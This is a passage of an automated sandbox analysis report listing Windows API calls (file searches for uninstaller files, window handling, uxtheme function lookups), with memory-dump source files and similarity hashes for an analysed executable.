                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: unins$unins???.*
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3541575487-1009660736
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 568898626-3772416878
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4011626565-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
• FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
• FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: a7c3a2807c1d07e9384e46bbff3edb0dc1c5102c97f3ad169cf1688449ca88a6
• Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
• Opcode Fuzzy Hash: a7c3a2807c1d07e9384e46bbff3edb0dc1c5102c97f3ad169cf1688449ca88a6
• Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 004833FA
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
• Instruction ID: 9902e76ed030cf172564c6423cfc444f456bf65fce7539c2ce1f68efba32f602
• Opcode Fuzzy Hash: 26f2524beb83a1697fb2f3c3d4c3f5548a09f48141019de32dcd2365822c4b68
• Instruction Fuzzy Hash: 4D017134A452019EEB11BBA5DD8AB5B27C45F10B09F08083BB9029F2A3CB6D9D41D71C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462B90), ref: 00462B14
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B50
• FindClose.KERNEL32(000000FF,00462B77,00462B70,?,00000000,?,00000000,00462B90), ref: 00462B6A
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 24c68e44cd600449d84999e90dba83f839d8db9d851fe02b8e21427015a7b51e
• Instruction ID: 0f193a6fcf1d943c675bf75123405c31ceeb2ecab595186adb6c93933d2a98b0
• Opcode Fuzzy Hash: 24c68e44cd600449d84999e90dba83f839d8db9d851fe02b8e21427015a7b51e
• Instruction Fuzzy Hash: 7121D871904B087EDB11DF65CC51ADEBBACDB49704F5084F7E808E31A1E6BCAE44CA5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 004241F4
• SetActiveWindow.USER32(?,?,?,0046CFFB), ref: 00424201
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042421A,?,?,?,0046CFFB), ref: 00423B5F
• SetFocus.USER32(00000000,?,?,?,0046CFFB), ref: 0042422E
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 649377781-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 85e094fd83fda52d6ba69bb43f194f943737e29f022f28d5c3d7585fd8a6de7d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF03A717001208BDB10EFAAA8C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417D1F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
• Opcode ID: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
• Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
• Opcode Fuzzy Hash: e9f294a83204c688928c4c422749f875b3ddc518ff0edd6358ab4a317cb2701d
• Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
• GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 1941d0d4221d31b2177a9e0bf96856282cc1e1b6b4252b38d63793718c861322
• Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
• Opcode Fuzzy Hash: 1941d0d4221d31b2177a9e0bf96856282cc1e1b6b4252b38d63793718c861322
• Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CaptureIconic
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2277910766-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004241AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2671590913-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NameUser
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
